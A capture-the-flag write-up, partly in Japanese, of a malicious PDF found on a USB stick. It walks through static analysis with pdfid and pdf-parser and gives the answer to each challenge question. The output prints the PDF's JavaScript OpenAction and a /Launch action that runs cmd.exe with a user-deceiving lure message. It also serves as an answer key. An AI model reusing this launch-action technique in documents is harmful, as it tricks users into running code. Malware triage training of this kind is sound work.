BTLO Challenge Suspicious USB Stick(Retired Challenge)
- Scenario
- Challenge Submission
- 1. What file is the autorun.inf running? (3 points)
- 2. Does the pdf file pass virustotal scan? (No malicious results returned) (2 points)
- 3. Does the file have the correct magic number? (2 points)
- 4. What OS type can the file exploit? (Linux, MacOS, Windows, etc) (5 points)
- 5. A Windows executable is mentioned in the pdf file, what is it? (3 points)
- 6. How many suspicious /OpenAction elements does the file have? (5 points)
Scenario
One of our clients informed us they recently suffered an employee data breach. As a startup company, they had a constrained budget allocated for security and employee training. I visited them and spoke with the relevant stakeholders. I also collected some suspicious emails and a USB drive an employee found on their premises. While I am analyzing the suspicious emails, can you check the contents on the USB drive?
Reading Material:
https://zeltser.com/analyzing-malicious-documents/
https://en.wikipedia.org/wiki/List_of_file_signatures
https://eternal-todo.com/tools/peepdf-pdf-analysis-tool.
Challenge Submission
1. What file is the autorun.inf running? (3 points)
Format: filename.extension
$ cat autorun.inf [autorun] open=README.pdf icon=autorun.ico
Answer: README.pdf
2. Does the pdf file pass virustotal scan? (No malicious results returned) (2 points)
True or False
SHA256: c868cd6ae39dc3ebbc225c5f8dc86e3b01097aa4b0076eac7960256038e60b43 https://www.virustotal.com/gui/file/c868cd6ae39dc3ebbc225c5f8dc86e3b01097aa4b0076eac7960256038e60b43
38/59
Answer: False
3. Does the file have the correct magic number? (2 points)
True or False
$ file README.pdf README.pdf: PDF document, version 1.7 $ hexdump -C README.pdf | head 00000000 25 50 44 46 2d 31 2e 37 0d 0a 25 b5 b5 b5 b5 0d |%PDF-1.7..%.....| 00000010 0a 31 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 54 79 70 |.1 0 obj..<</Typ| 00000020 65 2f 43 61 74 61 6c 6f 67 2f 50 61 67 65 73 20 |e/Catalog/Pages | 00000030 32 20 30 20 52 2f 4c 61 6e 67 28 65 6e 2d 55 53 |2 0 R/Lang(en-US| 00000040 29 20 2f 53 74 72 75 63 74 54 72 65 65 52 6f 6f |) /StructTreeRoo| 00000050 74 20 31 30 20 30 20 52 2f 4d 61 72 6b 49 6e 66 |t 10 0 R/MarkInf| 00000060 6f 3c 3c 2f 4d 61 72 6b 65 64 20 74 72 75 65 3e |o<</Marked true>| 00000070 3e 2f 4d 65 74 61 64 61 74 61 20 32 30 20 30 20 |>/Metadata 20 0 | 00000080 52 2f 56 69 65 77 65 72 50 72 65 66 65 72 65 6e |R/ViewerPreferen| 00000090 63 65 73 20 32 31 20 30 20 52 3e 3e 0d 0a 65 6e |ces 21 0 R>>..en|
Answer: True
4. What OS type can the file exploit? (Linux, MacOS, Windows, etc) (5 points)
Operating System
$ pdfinfo README.pdf
Creator: StarMan
CreationDate: Thu Feb 11 02:54:49 2021 EST
ModDate: Thu Feb 11 02:54:49 2021 EST
Tagged: yes
UserProperties: no
Suspects: no
Form: none
Syntax Warning: Bad launch-type link action
JavaScript: no
Pages: 1
Encrypted: no
Page size: 612 x 792 pts (letter)
Page rot: 0
File size: 136561 bytes
Optimized: no
PDF version: 1.7
$ pdfid README.pdf
PDFiD 0.2.7 README.pdf
PDF Header: %PDF-1.7
obj 25
endobj 25
stream 7
endstream 7
xref 4
trailer 4
startxref 4
/Page 2
/Encrypt 0
/ObjStm 1
/JS 1
/JavaScript 1
/AA 1
/OpenAction 1
/AcroForm 0
/JBIG2Decode 0
/RichMedia 0
/Launch 1
/EmbeddedFile 0
/XFA 0
/Colors > 2^24 0
$ pdf-parser -a README.pdf
This program has not been tested with this version of Python (3.9.7)
Should you encounter problems, please use Python version 3.8.7
Comment: 8
XREF: 4
Trailer: 4
StartXref: 4
Indirect object: 24
8: 4, 9, 18, 19, 21, 24, 26, 9
/Action 2: 27, 28
/Catalog 2: 1, 1
/ExtGState 2: 7, 8
/Filespec 1: 25
/Font 1: 5
/FontDescriptor 1: 6
/Metadata 2: 20, 20
/ObjStm 1: 17
/Page 2: 3, 3
/Pages 1: 2
/XRef 1: 22
Search keywords:
/JS 1: 27
/JavaScript 1: 27
/AA 1: 3
/OpenAction 1: 1
/Launch 1: 28
# /JS,/JavaScript,/OpenAction,/Launchのチェック
$ pdf-parser -o 27 README.pdf
This program has not been tested with this version of Python (3.9.7)
Should you encounter problems, please use Python version 3.8.7
obj 27 0
Type: /Action
Referencing:
<<
/S /JavaScript
/JS (this.exportDataObject({ cName: "README", nLaunch: 0 });)
/Type /Action
>>
$ pdf-parser -o 1 README.pdf
This program has not been tested with this version of Python (3.9.7)
Should you encounter problems, please use Python version 3.8.7
obj 1 0
Type: /Catalog
Referencing: 2 0 R, 10 0 R, 20 0 R, 21 0 R
<<
/Type /Catalog
/Pages 2 0 R
/Lang (en-US)
/StructTreeRoot 10 0 R
/MarkInfo
<<
/Marked true
>>
/Metadata 20 0 R
/ViewerPreferences 21 0 R
>>
obj 1 0
Type: /Catalog
Referencing: 2 0 R, 23 0 R, 27 0 R, 10 0 R, 20 0 R, 21 0 R
<<
/Type /Catalog
/Pages 2 0 R
/Names 23 0 R
/OpenAction 27 0 R
/Lang (en-US)
/StructTreeRoot 10 0 R
/MarkInfo
<<
/Marked true
>>
/Metadata 20 0 R
/ViewerPreferences 21 0 R
>>
$ pdf-parser -o 28 README.pdf
This program has not been tested with this version of Python (3.9.7)
Should you encounter problems, please use Python version 3.8.7
obj 28 0
Type: /Action
Referencing:
<<
/S /Launch
/Type /Action
/Win
<<
/F (cmd.exe)
/D '(c:\\\\windows\\\\system32)'
/P '(/Q /C %HOMEDRIVE%&cd %HOMEPATH%&(if exist "Desktop\\\\README.pdf" (cd "Desktop"))&(if exist "My Documents\\\\README.pdf" (cd "My Documents"))&(if exist "Documents\\\\README.pdf" (cd "Documents"))&(if exist "Escritorio\\\\README.pdf" (cd "Escritorio"))&(if exist "Mis Documentos\\\\README.pdf" (cd "Mis Documentos"))&(start README.pdf)\n\n\n\n\n\n\n\n\n\nTo view the encrypted content please tick the "Do not show this message again" box and press Open.)'
>>
>>
Answer: windows
5. A Windows executable is mentioned in the pdf file, what is it? (3 points)
Format: filename.exe
$ pdf-parser -o 28 README.pdfの結果より、
Answer: cmd.exe
6. How many suspicious /OpenAction elements does the file have? (5 points)
$ pdfid README.pdfの結果、そしてobj 1の/OpenAction 27と怪しいJavaScriptの実行がある。
Answer: 1
